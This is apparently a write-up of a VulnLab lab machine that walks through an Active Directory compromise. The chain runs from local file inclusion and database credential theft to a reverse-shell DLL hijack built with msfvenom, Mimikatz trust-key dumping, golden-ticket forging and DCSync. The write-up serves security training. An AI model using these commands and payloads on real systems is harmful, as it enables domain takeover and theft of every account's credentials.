VL-Trusted

,

Vulnlab Trusted: Exploiting Domain Trust Relationships in Active Directory

In this detailed VulnLab walkthrough of the “Trusted” machine, we navigate through a sophisticated Active Directory environment to demonstrate how trust relationships between domains can be exploited. Starting with basic web enumeration that reveals a critical Local File Inclusion (LFI) vulnerability, we progressively escalate privileges by leveraging credential harvesting, Active Directory permissions abuse, and ultimately performing a domain trust attack. This step-by-step walkthrough showcases advanced Windows penetration testing techniques including DLL hijacking, Kerberos ticket manipulation, and DCSync attacks that cybersecurity professionals can apply to secure enterprise environments against similar vulnerabilities.

Initial Reconnaissance

Our initial port scan revealed several open ports and services on the target:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
PORT      STATE SERVICE       REASON          VERSION
53/tcp    open  domain        syn-ack ttl 127 Simple DNS Plus
80/tcp    open  http          syn-ack ttl 127 Apache httpd 2.4.53 
88/tcp    open  kerberos-sec  syn-ack ttl 127 Microsoft Windows Kerberos (server time: 2025-04-12 19:39:41Z)
135/tcp   open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
139/tcp   open  netbios-ssn   syn-ack ttl 127 Microsoft Windows
389/tcp   open  ldap          syn-ack ttl 127 Microsoft Windows 
443/tcp   open  ssl/http      syn-ack ttl 127 Apache httpd 2.4.53 
445/tcp   open  microsoft-ds? syn-ack ttl 127
464/tcp   open  kpasswd5?     syn-ack ttl 127
593/tcp   open  ncacn_http    syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped    syn-ack ttl 127
3306/tcp  open  mysql         syn-ack ttl 127 MariaDB 5.5.5-10.4.24
| mysql-info: 
|   Protocol: 10
|   Version: 5.5.5-10.4.24-MariaDB
|   Thread ID: 9
|   Capabilities flags: 63486
|   Some Capabilities: SupportsTransactions, Support41Auth, FoundRows, Speaks41ProtocolNew, SupportsCompression, IgnoreSigpipes, DontAllowDatabaseTableColumn, LongColumnFlag, InteractiveClient, SupportsLoadDataLocal, ConnectWithDatabase, IgnoreSpaceBeforeParenthesis, ODBCClient, Speaks41ProtocolOld, SupportsMultipleResults, SupportsMultipleStatments, SupportsAuthPlugins
|   Status: Autocommit
|   Salt: V7M]l*(*:'O="/g<2%a:
|_  Auth Plugin Name: mysql_native_password
3389/tcp  open  ms-wbt-server syn-ack ttl 127 Microsoft Terminal
| rdp-ntlm-info: 
|   Target_Name: LAB
|   NetBIOS_Domain_Name: LAB
|   NetBIOS_Computer_Name: LABDC
|   DNS_Domain_Name: lab.trusted.vl
|   DNS_Computer_Name: labdc.lab.trusted.vl
|   DNS_Tree_Name: trusted.vl
|   Product_Version: 10.0.20348
|_  System_Time: 2025-04-12T19:40:41+00:00
5985/tcp  open  http          syn-ack ttl 127 Microsoft HTTPAPI
9389/tcp  open  mc-nmf        syn-ack ttl 127 .NET Message Framing
47001/tcp open  http          syn-ack ttl 127 Microsoft HTTPAPI 
49664/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
49665/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
49666/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
49667/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
49668/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
49672/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
49677/tcp open  ncacn_http    syn-ack ttl 127 Microsoft Windows
49678/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
49687/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
57941/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
58459/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC

Web Enumeration

The target is running a web server on port 80. I used feroxbuster to discover hidden directories:

1
feroxbuster -u http://10.10.213.214/

This revealed a /dev directory:

1
301      GET        9l       30w      336c http://10.10.213.214/dev => http://10.10.213.214/dev/

Xamoo Homepage
Manes Winchester Page

Exploiting Local File Inclusion (LFI)

Testing for LFI vulnerability:

1
http://10.10.213.214/dev/index.html?view=../

Unsecure File Query
Confirming the LFI vulnerability by accessing Windows system files:

1
http://10.10.213.214/dev/index.html?view=../../../../../../windows/win.ini

LFI Vulnerability Confirmed
Using ffuf to enumerate potential files via LFI:

1
ffuf -u "http://10.10.213.214/dev/index.html?view=FUZZ" -w /usr/share/seclists/Fuzzing/LFI/LFI-Jhaddix.txt -e .php,.txt,.log,.ini -fl 35,33,40

DB File Found
To extract the contents of the PHP file, I used a base64 filter:

1
http://10.10.213.214/dev/index.html?view=php://filter/read=convert.base64-encode/resource=db.php

MongoDB Password

Database Enumeration

After decoding the base64 output, I obtained MySQL credentials:
root : SuperSecureMySQLPassw0rd1337.
Connecting to the MySQL server:

1
mysql -h 10.10.213.214 -u root -p --skip-ssl

Enumerated the databases and tables:

1
2
3
4
SHOW DATABASES;
USE news;
SHOW TABLES;
SELECT * FROM users;

Retrieved user credentials:

1
2
3
4
5
6
7
+----+------------+--------------+-----------+----------------------------------+
| id | first_name | short_handle | last_name | password                         |
+----+------------+--------------+-----------+----------------------------------+
|  1 | Robert     | rsmith       | Smith     | 7e7abb54bbef42f0fbfa3007b368def7 |
|  2 | Eric       | ewalters     | Walters   | d6e81aeb4df9325b502a02f11043e0ad |
|  3 | Christine  | cpowers      | Powers    | e3d3eb0f46fe5d75eed8d11d54045a60 |
+----+------------+--------------+-----------+----------------------------------+

After cracking the hashes:

1
rsmith : IHateEric2

SMB Enumeration

Checked for accessible SMB shares with the credentials:

1
netexec smb 10.10.213.214 -u rsmith -p <PASS> --shares

RSmith Shares
Other user accounts identified:

1
2
ewalters  
cpowers

No valuable content was found on the accessible shares.

Active Directory Enumeration with BloodHound

Used BloodHound to map the domain:

1
netexec ldap 10.10.213.214 -u rsmith -p IHateEric2 --bloodhound --dns-server 10.10.213.214 -c ALL --dns-tcp

BloodHound revealed a bidirectional domain trust between trusted.vl and lab.trusted.vl:
Cross Domain Trust
Also discovered that rsmith has ForceChangePassword rights over ewalters:
Attack Path

Lateral Movement

Exploiting the ForceChangePassword right to gain access as ewalters:

1
bloodyAD --host "labdc.lab.trusted.vl" -d "lab.trusted.vl" -u "rsmith" -p "<PASS>" set password "ewalters" "HelloWorld123@"

Connecting with the new credentials:

1
evil-winrm -i labdc.lab.trusted.vl -u ewalters -p HelloWorld123@

In the C:\AVTest directory, found an interesting readme:

1
2
3
4
5
type readme.txt
Since none of the AV Tools we tried here in the lab satisfied our needs it's time to clean them up.
I asked Christine to run them a few times, just to be sure.

Let's just hope we don't have to set this lab up again because of this.

DLL Hijacking

Transferred the KasperskyRemovalTool.exe to analyze:
On Linux:

1
impacket-smbserver smb /mnt -smb2support

On Windows:

1
copy .\KasperskyRemovalTool.exe \\10.8.5.195\smb\KasperskyRemovalTool.exe

Analyzed the executable with Process Monitor to identify DLL injection opportunities:

Set up filters for:

  1. Process Name
  2. Path containing .dll
  3. Result containing “NAME NOT FOUND”

Filter Name
DLL Filter
Final Filter
Process Monitor revealed that the executable attempts to load a DLL named KasperskyRemovalToolENU.dll from the current directory:
DLL Injection Opportunity
Created a malicious DLL with the same name containing a reverse shell:

1
msfvenom -p windows/shell_reverse_tcp LHOST=10.8.5.195 LPORT=4444 -f dll > KasperskyRemovalToolENU.dll

Set up SMB server to transfer the file:

1
impacket-smbserver smb /mnt -smb2support

Copied the malicious DLL to the target:

1
copy \\10.8.5.195\smb\KasperskyRemovalToolENU.dll .\KasperskyRemovalToolENU.dll

After executing the Kaspersky tool, received a reverse shell:
Got Shell

Privilege Escalation via Domain Trust Abuse

Uploaded Mimikatz to map domain trust and forge a golden ticket:

1
privilege::debug
1
lsadump::trust /patch

Domain Trust
Extracted the krbtgt hash:

1
lsadump::dcsync /domain:lab.trusted.vl /all

KRBTGT Hash

Gathered the following information:

  1. LAB.TRUSTED.VL SID: S-1-5-21-2241985869-2159962460-1278545866
  2. TRUSTED.VL SID: S-1-5-21-3576695518-347000760-3731839591 + 519
  3. krbtgt hash: c7a03c565c68c6fac5f8913fab576ebd

Created a golden ticket to exploit the trust relationship:

1
Kerberos::golden /user:Administrator /domain:lab.trusted.vl /sid:S-1-5-21-2241985869-2159962460-1278545866 /sids:S-1-5-21-3576695518-347000760-3731839591-519 /rc4:c7a03c565c68c6fac5f8913fab576ebd /service:krbtgt /target:trusted.vl /ticket:trustkey.kirbi ptt

Performed a DCSync attack to extract all domain credentials:

1
lsadump::dcsync /domain:trusted.vl /dc:trusteddc.trusted.vl /all

Trusted Admin

Final Privilege Escalation

Since we couldn’t directly access the root.txt file without administrator context, we changed the Administrator password and used RunasCs to get a shell with administrative privileges:

1
net user Administrator HelloWorld123@
1
./RunasCs.exe Administrator 'HelloWorld123@' cmd.exe -r '10.8.5.195:443'

This provided us with full administrative access to the domain, completing the penetration test.
Vulnlab Cert